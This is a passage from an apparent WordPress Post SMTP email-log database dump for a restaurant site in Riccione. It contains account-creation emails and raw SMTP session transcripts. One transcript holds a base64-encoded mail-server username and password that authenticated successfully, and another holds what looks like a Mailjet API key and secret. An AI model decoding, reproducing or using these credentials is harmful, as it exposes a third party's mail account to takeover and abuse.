L9qH0jbMpkXSCUnCLPf2o1GE+jcSdL6grxJrprGyr6B9yInRFpnbnCHYGv5yV+jvE2ZvNX4k\r\njNzp34XZ5BSziXkVNNy0+DEQJg8zhyXUrbdbuembwn9B2E0p22a4Vsw28TTWRorXLJ5i/opg\r\nsmEaf7Ldg84qoazkCgzCjS+P3LY3PuhqLb/5BI3IfGuxWhF7trfj5YGM1L6X2qqOm3TxMpb/\r\n8n9rqtqFd159Tbji2loGQDcXutdurys99cmBA386jXdBk0HbYhcxkvpfb0ckVy9J+fKbXyvz\r\nbe62kM4vQ0tBrICBJh6d0jdM8CMo0cMvkzR9s2koHnPsTaJnO0k59seRXwmXyBDmXDY/JfGE\r\nKycafDeIPZdOkRF8JuDYBD7vx27H+T9D+VSk3fgMx/nDrF/3Kyg/hrJ1gffZNHHuNj4rA/0q\r\nvrdh1azjLpE6yaIwsps8T66Qj2EduPFvGF6lITSGuuir9HNmPWNjHmIuMf/B/JkNxhtBMnuK\r\n/SlHuVAuj3uW+wV3g/uct0i71JBMMSv9KHynhZCX7o1b7skAVn5LgKZ4890UoBnM3twAzaJM\r\nfYDmyCLSFqB5Ekr6xO9CFisaceJXr58GoiB3AjQlIRASoBligRUBmiWRYA/QHFkKOwM0j+MH\r\n1pTZK6L1+rUZ7nZPR0tTc5cqLtYUr6rzqAJvVJmOzpamNpUWiZ0Op7vd5WjrsrW46ro7VSW1\r\nbZ12R1O3s7YDhZP8o+KgITCahMos3xAud3R0trjbVKZ1sbHflcY8KCN2UkGi8etXj7U4g7hJ\r\nO/GQDtJCmkgz6cJv4zj8ojKReKTq8I3qH+ao0C8O0inJtyGnDYzsxO6UtLmQakNNNpRxoY5u\r\nlFaRElKLoxht+LYJx5zIdwQ0J31Ldl7S8A+ySQHLLP+SdDlyHZKdbslOE1mHs2P/lbn/Dxys\r\nLrMKZW5kc3RyZWFtCmVuZG9iago1MyAwIG9iagozMjY1CmVuZG9iago1MSAwIG9iago8PCAv\r\nVHlwZSAvRm9udAovU3VidHlwZSAvQ0lERm9udFR5cGUyCi9CYXNlRm9udCAvTmltYnVzU2Fu\r\ncy1SZWd1bGFyCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmlu\r\nZyAoSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDQ5IDAgUgov\r\nQ0lEVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFsyNzYgNjA2IDU1MiA1NTIgMjc2IDIyMCA0\r\nOTYgODI2IDI3NiA2NjIgNTUyIDU1MiAzMzAgNTUyIDY2MiA1NTIgNTUyIDYwNiA0OTYgNTUy\r\nIDQ5NiAyMjAgNDk2IDI3NiAzMzAgNjYyIDQ5NiA1NTIgMjc2IDU1MiA1NTIgNTUyIDMzMCAx\r\nODkgNzE2IF0KXQo+PgplbmRvYmoKNTIgMCBvYmoKPDwgL0xlbmd0aCA2MDIgPj4Kc3RyZWFt\r\nCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJl\r\nZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcg\r\nKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1V\r\nQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxG\r\nRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDww\r\nMDAwPgo8MDAwMT4gPDAwMjI+IFs8MDA1ND4gPDAwNjE+IDwwMDZFPiA8MDA3ND4gPDAwNjk+\r\nIDwwMDczPiA8MDA2RD4gPDAwMjA+IDwwMDQxPiA8MDA3NT4gPDAwNjc+IDwwMDcyPiA8MDA2\r\nND4gPDAwNDI+IDwwMDZGPiA8MDA2NT4gPDAwNDY+IDwwMDYzPiA8MDA3MD4gPDAwNzY+IDww\r\nMDZDPiA8MDA3OD4gPDAwMkU+IDwwMDI4PiA8MDA1Mz4gPDAwN0E+IDwwMDMyPiA8MDAyRj4g\r\nPDAwMzA+IDwwMDM2PiA8MDAzMT4gPDAwMjk+IDwwMDI3PiA8MDA0Mz4gXQplbmRiZnJhbmdl\r\nCmVuZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NNYXAgZGVmaW5lcmVzb3VyY2UgcG9w\r\nCmVuZAplbmQKCmVuZHN0cmVhbQplbmRvYmoKMTggMCBvYmoKPDwgL1R5cGUgL0ZvbnQKL1N1\r\nYnR5cGUgL1R5cGUwCi9CYXNlRm9udCAvTmltYnVzU2Fucy1SZWd1bGFyCi9FbmNvZGluZyAv\r\nSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFs1MSAwIFJdCi9Ub1VuaWNvZGUgNTIgMCBS\r\nPj4KZW5kb2JqCjIgMCBvYmoKPDwKL1R5cGUgL1BhZ2VzCi9LaWRzIApbCjUgMCBSCl0KL0Nv\r\ndW50IDEKL1Byb2NTZXQgWy9QREYgL1RleHQgL0ltYWdlQiAvSW1hZ2VDXQo+PgplbmRvYmoK\r\neHJlZgowIDU0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAwMDAwOSAwMDAwMCBuIAowMDAw\r\nMjE3MTY3IDAwMDAwIG4gCjAwMDAwMDAxNjMgMDAwMDAgbiAKMDAwMDAwMDI1OCAwMDAwMCBu\r\nIAowMDAwMTk3ODE2IDAwMDAwIG4gCjAwMDAyMDk4ODcgMDAwMDAgbiAKMDAwMDIxMjI3OSAw\r\nMDAwMCBuIAowMDAwMDAwMjk1IDAwMDAwIG4gCjAwMDAwMDE4OTEgMDAwMDAgbiAKMDAwMDAw\r\nMTkxMSAwMDAwMCBuIAowMDAwMDEzNjA5IDAwMDAwIG4gCjAwMDAwMTM2MzEgMDAwMDAgbiAK\r\nMDAwMDAxNTQwMyAwMDAwMCBuIAowMDAwMDE1NDI0IDAwMDAwIG4gCjAwMDAwMTczMTQgMDAw\r\nMDAgbiAKMDAwMDAxNzMzNSAwMDAwMCBuIAowMDAwMTk0Njc3IDAwMDAwIG4gCjAwMDAyMTcw\r\nMjIgMDAwMDAgbiAKMDAwMDIwMjc3NSAwMDAwMCBuIAowMDAwMTk0NzAwIDAwMDAwIG4gCjAw\r\nMDAxOTcwMzggMDAwMDAgbiAKMDAwMDE5NzA1OSAwMDAwMCBuIAowMDAwMTk3MTA0IDAwMDAw\r\nIG4gCjAwMDAxOTcxNTYgMDAwMDAgbiAKMDAwMDE5NzM0OSAwMDAwMCBuIAowMDAwMTk3NjQ5\r\nIDAwMDAwIG4gCjAwMDAxOTc0MTMgMDAwMDAgbiAKMDAwMDE5NzUyNSAwMDAwMCBuIAowMDAw\r\nMTk3NzEyIDAwMDAwIG4gCjAwMDAxOTgyMTcgMDAwMDAgbiAKMDAwMDE5OTgzMCAwMDAwMCBu\r\nIAowMDAwMTk3OTM4IDAwMDAwIG4gCjAwMDAxOTgxOTAgMDAwMDAgbiAKMDAwMDE5OTg1MSAw\r\nMDAwMCBuIAowMDAwMjAwMDYxIDAwMDAwIG4gCjAwMDAyMDE5ODYgMDAwMDAgbiAKMDAwMDIw\r\nMjI2MSAwMDAwMCBuIAowMDAwMjAxOTY1IDAwMDAwIG4gCjAwMDAyMDI5MTcgMDAwMDAgbiAK\r\nMDAwMDIwMzE3NyAwMDAwMCBuIAowMDAwMjA5MDQ4IDAwMDAwIG4gCjAwMDAyMDkzMzggMDAw\r\nMDAgbiAKMDAwMDIwOTAyNyAwMDAwMCBuIAowMDAwMjEwMDIzIDAwMDAwIG4gCjAwMDAyMTAy\r\nODggMDAwMDAgbiAKMDAwMDIxMTYzNiAwMDAwMCBuIAowMDAwMjExODU5IDAwMDAwIG4gCjAw\r\nMDAyMTE2MTUgMDAwMDAgbiAKMDAwMDIxMjQyMCAwMDAwMCBuIAowMDAwMjEyNjMzIDAwMDAw\r\nIG4gCjAwMDAyMTYwMTAgMDAwMDAgbiAKMDAwMDIxNjM2OCAwMDAwMCBuIAowMDAwMjE1OTg5\r\nIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgNTQKL0luZm8gMSAwIFIKL1Jvb3QgMjkgMCBS\r\nCj4+CnN0YXJ0eHJlZgoyMTcyNjUKJSVFT0YK\r\n--=_961bba5150b3347edf72db24ae2b3dc6--\r\n.\r\n250 OK queued as 8fcd7f58-8dc9-4e2b-9d2d-e907485a8586\r\n'),(37588,3687,'mwb_wgm_order_giftcard','send'),(37589,3692,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37590,3692,'success',''),(37591,3692,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37592,3692,'to_header','jdydpehffrf@demo.com'),(37593,3692,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37594,3692,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37595,3692,'original_to','jdydpehffrf@demo.com'),(37596,3692,'original_subject','Your Sol Y Mar account has been created!'),(37597,3692,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi jdydpehffrf,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jdydpehffrf</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37598,3692,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37599,3692,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 31 Dec 2020 10:44:26 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37600,3693,'solution','Not found, check status column for more info.'),(37601,3693,'success','1'),(37602,3693,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37603,3693,'to_header','jdydpehffrf@demo.com'),(37604,3693,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37605,3693,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37606,3693,'original_to','jdydpehffrf@demo.com'),(37607,3693,'original_subject','Your Sol Y Mar account has been created!'),(37608,3693,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi jdydpehffrf,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jdydpehffrf</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37609,3693,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37610,3693,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 31 Dec 2020 10:44:28 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<jdydpehffrf@demo.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: jdydpehffrf@demo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <e268ce937dc2056103bf1694e37f500b@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Thu, 31 Dec 2020 15:44:28 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi jdydpehffrf,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>jdydpehffrf</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kv07o-0001cg-HE\r\n'),(37611,3694,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37612,3694,'success',''),(37613,3694,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37614,3694,'to_header','lupswrgooxz@demo.com'),(37615,3694,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37616,3694,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37617,3694,'original_to','lupswrgooxz@demo.com'),(37618,3694,'original_subject','Your Sol Y Mar account has been created!'),(37619,3694,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 